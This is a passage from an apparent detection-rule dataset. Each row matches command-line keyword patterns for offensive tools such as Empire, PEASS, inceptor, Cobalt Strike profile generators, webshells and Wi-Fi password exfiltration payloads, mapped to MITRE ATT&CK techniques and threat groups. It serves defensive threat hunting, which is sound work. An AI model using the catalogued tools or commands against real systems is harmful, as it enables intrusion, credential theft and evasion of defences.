Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1639" "* ImplantSSP.exe*",".{0,1000}\sImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","1640" "* import Exrop*",".{0,1000}\simport\sExrop.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool 
which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tool","https://github.com/d4em0n/exrop","1","0","N/A","N/A","N/A","3","285","22","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z","1641" "* import LinpeasBaseBuilder*",".{0,1000}\simport\sLinpeasBaseBuilder.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1642" "* import LinpeasBuilder*",".{0,1000}\simport\sLinpeasBuilder.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1643" "* import PEASLoaded*",".{0,1000}\simport\sPEASLoaded.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1644" "* import PEASRecord*",".{0,1000}\simport\sPEASRecord.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation 
Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","1645" "* import Spoofer, Sniffer, Roaster*",".{0,1000}\simport\sSpoofer,\sSniffer,\sRoaster.{0,1000}","offensive_tool_keyword","RITM","python Man in the middle ","T1557.002 - T1040 - T1098.002 - T1557.001 - T1552.001","TA0006 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/Tw1sm/RITM","1","0","N/A","N/A","9","3","292","27","2024-11-20T14:27:24Z","2022-10-05T01:10:33Z","1646" "* Import tokens from other tools for use in GraphRunner*",".{0,1000}\sImport\stokens\sfrom\sother\stools\sfor\suse\sin\sGraphRunner.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","1647" "* -ImportDllPathPtr *",".{0,1000}\s\-ImportDllPathPtr\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1648" "* impress-remote-discover.nse*",".{0,1000}\simpress\-remote\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1649" "* -inc -u=0 *.pwd*",".{0,1000}\s\-inc\s\-u\=0\s.{0,1000}\.pwd.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1650" "* -inc=digits *",".{0,1000}\s\-inc\=digits\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","1651" "* inceptor.*dotnet*",".{0,1000}\sinceptor\..{0,1000}dotnet.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","1652" "* inceptor.py*",".{0,1000}\sinceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","1653" "* 
inceptor.py*",".{0,1000}\sinceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","1654" "* inceptor.spec*",".{0,1000}\sinceptor\.spec.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","1655" "* --includeModules amass*",".{0,1000}\s\-\-includeModules\samass.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","1656" "* -InFile Wi-Fi-PASS*",".{0,1000}\s\-InFile\sWi\-Fi\-PASS.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","1657" "* InflativeLoading.py*",".{0,1000}\sInflativeLoading\.py.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","1658" "* 
informix-brute.nse*",".{0,1000}\sinformix\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1659" "* informix-query.nse*",".{0,1000}\sinformix\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1660" "* informix-tables.nse*",".{0,1000}\sinformix\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1661" "* --Inject --stub *.dll* --app *",".{0,1000}\s\-\-Inject\s\-\-stub\s.{0,1000}\.dll.{0,1000}\s\-\-app\s.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","1662" "* -Injector NtMapViewOfSection*",".{0,1000}\s\-Injector\sNtMapViewOfSection.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","1663" "* -Injector VirtualAllocEx*",".{0,1000}\s\-Injector\sVirtualAllocEx.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - 
Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","N/A","10","10","1109","156","2025-04-16T17:15:04Z","2021-08-06T20:55:26Z","1664" "* --input 10m_usernames.txt*",".{0,1000}\s\-\-input\s10m_usernames\.txt.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","1665" "* -InputObject $backdoorcode -Append *",".{0,1000}\s\-InputObject\s\$backdoorcode\s\-Append\s.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#content","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","1666" "* -InputPath .\TrustedForests.txt*",".{0,1000}\s\-InputPath\s\.\\TrustedForests\.txt.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","0","N/A","N/A","8","10","1086","100","2025-04-21T12:43:50Z","2022-04-28T01:37:32Z","1667" "* --insecure brute --userpass *",".{0,1000}\s\-\-insecure\sbrute\s\-\-userpass\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - 
TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","1668" "* --insecure brute --users *",".{0,1000}\s\-\-insecure\sbrute\s\-\-users\s.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","1669" "* instabf.py*",".{0,1000}\sinstabf\.py.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","1670" "* instainsane.sh*",".{0,1000}\sinstainsane\.sh.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/umeshshinde19/instainsane","1","0","N/A","N/A","7","7","655","371","2024-02-11T10:29:05Z","2018-12-02T22:48:11Z","1671" "* install *masscan*",".{0,1000}\sinstall\s.{0,1000}masscan.{0,1000}","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","Black Basta - Unit 29155 - Akira - EMBER BEAR","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","#linux","N/A","N/A","10","24345","3118","2024-12-13T12:22:18Z","2013-07-28T05:35:33Z","1672" "* install amass",".{0,1000}install\samass","offensive_tool_keyword","Amass","In-depth subdomain enumeration tool that performs scraping, recursive brute forcing, crawling of web archives, name altering and reverse DNS sweeping","T1593 - T1594 - T1595 - T1567 - T1569","TA0007 - TA0009 - TA0004 - TA0005 - TA0011","N/A","EMBER BEAR","Reconnaissance","https://github.com/OWASP/Amass","1","0","#linux","N/A","5","10","12855","1965","2025-04-21T23:28:45Z","2018-07-10T16:05:08Z","1673" "* install armitage*",".{0,1000}\sinstall\sarmitage.{0,1000}","offensive_tool_keyword","armitage","Armitage is a graphical cyber attack management tool for Metasploit that visualizes your targets. recommends exploits and exposes the advanced capabilities of the framework ","T1210 - T1059.003 - T1547.001 - T1057 - T1046 - T1562.001 - T1071.001 - T1060 - T1573.002","TA0002 - TA0008 - TA0005 - TA0007 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/r00t0v3rr1d3/armitage","1","0","N/A","N/A","N/A","2","129","32","2022-12-06T00:17:23Z","2022-01-23T17:32:01Z","1674" "* install arsenal-cli*",".{0,1000}\sinstall\sarsenal\-cli.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","1675" "* install autobloody*",".{0,1000}\sinstall\sautobloody.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - 
T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","1676" "* install backdoor-factory*",".{0,1000}\sinstall\sbackdoor\-factory.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","N/A","10","10","3369","788","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z","1677" "* install chisel*",".{0,1000}\sinstall\schisel.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","N/A","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","1681" "* install chntpw*",".{0,1000}\sinstall\schntpw.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","1682" "* install cliws*",".{0,1000}\sinstall\scliws.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#linux","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","1683" "* install creddump7*",".{0,1000}\sinstall\screddump7.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential 
Access","https://github.com/CiscoCXSecurity/creddump7","1","0","N/A","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","1684" "* install dnscrypt-proxy*",".{0,1000}\sinstall\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","N/A","10","10","11963","1040","2025-04-21T03:51:34Z","2018-01-08T23:21:21Z","1685" "* install evil-proxy*",".{0,1000}\sinstall\sevil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","N/A","9","2","172","96","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z","1686" "* install evil-winrm*",".{0,1000}\sinstall\sevil\-winrm.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1687" "* install github *merlin*",".{0,1000}\sinstall\sgithub\s.{0,1000}merlin.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/MythicAgents/merlin","1","0","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","1688" "* install gsocket*",".{0,1000}\sinstall\sgsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","1689" "* install hekatomb*",".{0,1000}\sinstall\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and user information. Then it will download all DPAPI blobs of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/Processus-Thief/HEKATOMB","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","1690" "* install holehe*",".{0,1000}\sinstall\sholehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","1691" "* install iodine*",".{0,1000}\sinstall\siodine.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","1692" "* install krbjack*",".{0,1000}\sinstall\skrbjack.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","1693" "* install metasploit-framework*",".{0,1000}\sinstall\smetasploit\-framework.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary 